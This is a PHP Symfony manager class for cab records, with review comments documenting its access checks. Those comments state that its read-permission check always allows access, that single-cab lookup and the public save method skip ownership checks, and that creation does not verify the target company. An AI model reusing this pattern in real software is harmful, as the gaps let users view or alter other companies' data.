Viewing: CabManager.php
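<?php

namespace AppBundle\Manager;

use Doctrine\ORM\EntityManager;
use Symfony\Component\HttpKernel\Exception\BadRequestHttpException;
use Symfony\Component\HttpKernel\Exception\NotFoundHttpException;
use Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException;
use Symfony\Component\Security\Core\Authentication\Token\Storage\TokenStorage;
use Symfony\Component\Security\Core\Authorization\AuthorizationChecker;
use Symfony\Component\HttpFoundation\Request;
use AppBundle\Entity\Cab;

/**
 * Service-layer manager for Cab entities: create, update, soft/hard delete
 * and lookup, with a company-based write check for non-super-admin users.
 *
 * Authorization summary, as implemented in this class:
 *  - writes (create/update/delete) go through _controlUserWriteRights();
 *  - list reads go through _controlUserReadRights(), which allows everything;
 *  - getOneCab() and registerCab() perform no access check of their own.
 *
 * NOTE(review): $this->manager is used throughout but never assigned here;
 * presumably AbstractResourceManager's constructor stores the EntityManager
 * under that name. Confirm against the parent class.
 */
class CabManager extends AbstractResourceManager
{
    private $tokenStorage;
    private $authChecker;

    /**
     * @param EntityManager        $manager      Doctrine entity manager, forwarded to the parent.
     * @param TokenStorage         $tokenStorage Source of the current security token / user.
     * @param AuthorizationChecker $authChecker  Used for the ROLE_SUPER_ADMIN check.
     */
    public function __construct(EntityManager $manager, TokenStorage $tokenStorage, AuthorizationChecker $authChecker)
    {
        parent::__construct($manager);
        $this->tokenStorage = $tokenStorage;
        $this->authChecker = $authChecker;
    }

    /**
     * Persist a new cab attached to the given company.
     *
     * NOTE(review): the write check is called without a cab, so it has nothing
     * to compare the caller's company against. $company is therefore not
     * verified here; callers must make sure a non-super-admin can only pass
     * their own company, or that check should be added to this method.
     *
     * @param Cab   $cab     New, not yet persisted cab.
     * @param mixed $company Company the cab will belong to.
     *
     * @return Cab The persisted cab.
     *
     * @throws AccessDeniedHttpException When no authenticated user object is available.
     */
    public function createCab($cab, $company)
    {
        $this->_controlUserWriteRights();

        return $this->registerCab($cab, $company, true);
    }

    /**
     * Flush changes made to an existing cab after checking write access.
     *
     * @param Cab $cab Already-managed cab carrying the modifications.
     *
     * @return Cab
     *
     * @throws AccessDeniedHttpException When the caller's company differs from the cab's.
     */
    public function updateCab(Cab $cab)
    {
        $this->_controlUserWriteRights($cab);

        return $this->registerCab($cab);
    }

    /**
     * Deactivate a cab; with $hardDelete also flag it as deleted.
     *
     * Both variants only set flags on the entity; no row is removed here.
     *
     * @param Cab  $cab
     * @param bool $hardDelete When truthy, additionally sets the isDeleted flag.
     *
     * @return Cab
     *
     * @throws AccessDeniedHttpException When the caller's company differs from the cab's.
     */
    public function deleteCab($cab, $hardDelete = false)
    {
        $this->_controlUserWriteRights($cab);

        $cab->setIsActive(false);
        if ($hardDelete) {
            $cab->setIsDeleted(true);
        }

        return $this->registerCab($cab);
    }

    /**
     * Search cabs through the Cab repository using the given filters.
     *
     * NOTE(review): the read check below always succeeds, so $companyId is
     * not compared with the caller's own company in this class.
     *
     * @return mixed Whatever the repository's search() returns.
     */
    public function getCabs($companyId, $minCostPerHour, $maxCostPerHour, $minCostPerDay, $maxCostPerDay, $onlyActiveCabs, $deletedCabs)
    {
        $this->_controlUserReadRights();

        $repository = $this->manager->getRepository('AppBundle:Cab');

        return $repository->search(
            $companyId,
            $minCostPerHour,
            $maxCostPerHour,
            $minCostPerDay,
            $maxCostPerDay,
            $onlyActiveCabs,
            $deletedCabs
        );
    }

    /**
     * Load a single cab by id.
     *
     * Cabs flagged as deleted are reported as not found unless
     * $includeDeletedCabs is truthy.
     *
     * NOTE(review): no read or ownership check is performed here; any caller
     * that can reach this method can load any cab by id.
     *
     * @param mixed $cabId
     * @param bool  $includeDeletedCabs
     *
     * @return Cab
     *
     * @throws NotFoundHttpException When the cab does not exist or is hidden as deleted.
     */
    public function getOneCab($cabId, $includeDeletedCabs = false)
    {
        $cab = $this->manager
            ->getRepository('AppBundle:Cab')
            ->find($cabId);

        if (!$cab) {
            throw new NotFoundHttpException('Cab not found: ( with cabId = '.$cabId . ')');
        }

        // Same message as the "missing" case, so a deleted cab is
        // indistinguishable from one that never existed.
        if (!$includeDeletedCabs && $cab->getIsDeleted()) {
            throw new NotFoundHttpException('Cab not found: ( with cabId = '.$cabId. ')');
        }

        return $cab;
    }

    /**
     * Persist (when new) and flush a cab.
     *
     * This method is public and performs no access check; the checks live in
     * createCab()/updateCab()/deleteCab(). flush() is called without an
     * argument, so every pending change tracked by the entity manager is
     * written, not only this cab.
     *
     * @param Cab   $cab
     * @param mixed $company Only used when $new is truthy.
     * @param bool  $new     Whether the cab still has to be persisted.
     *
     * @return Cab
     */
    public function registerCab($cab, $company = null, $new = false)
    {
        if ($new) {
            $cab->setCompany($company);
            $this->manager->persist($cab);
        }

        $this->manager->flush();

        return $cab;
    }

    /**
     * Decide whether the current user may write to $cab.
     *
     * ROLE_SUPER_ADMIN is always allowed. Any other caller needs an
     * authenticated user object; with no cab (creation) that is sufficient,
     * otherwise the user's company must equal the cab's company.
     *
     * Changes from the earlier version of this method:
     *  - a missing token or a non-object user is now rejected with
     *    AccessDeniedHttpException instead of calling a method on it;
     *  - the "cab is deleted" NotFoundHttpException that followed the
     *    if/else was unreachable (both branches return or throw) and has
     *    been dropped. NOTE(review): if deleted cabs are meant to be
     *    read-only for company staff, that check has to be reinstated
     *    ahead of the company comparison.
     *
     * @param Cab|null $cab Cab being modified, or null when creating.
     *
     * @return bool Always true when it returns.
     *
     * @throws AccessDeniedHttpException
     */
    private function _controlUserWriteRights($cab = null)
    {
        if ($this->authChecker->isGranted('ROLE_SUPER_ADMIN')) {
            return true;
        }

        // getToken() may return null and getUser() is not guaranteed to
        // return an object, so fail closed before dereferencing either.
        $token = $this->tokenStorage->getToken();
        $staff = $token !== null ? $token->getUser() : null;
        if (!is_object($staff)) {
            throw new AccessDeniedHttpException('Access denied. Not allowed to access the resource.');
        }

        // In case the Company Admin is creating a new cab entity.
        if ($cab == null) {
            return true;
        }

        // Loose object comparison: PHP compares class and property values,
        // not identity. NOTE(review): comparing company identifiers would be
        // a more explicit ownership test.
        if ($staff->getCompany() == $cab->getCompany()) {
            return true;
        }

        throw new AccessDeniedHttpException('Access denied. Not allowed to access the resource.');
    }

    /**
     * Read-access check; currently a stub that allows every caller.
     *
     * @param Cab|null $cab Unused.
     *
     * @return bool Always true.
     */
    private function _controlUserReadRights($cab = null)
    {
        return true;
    }
}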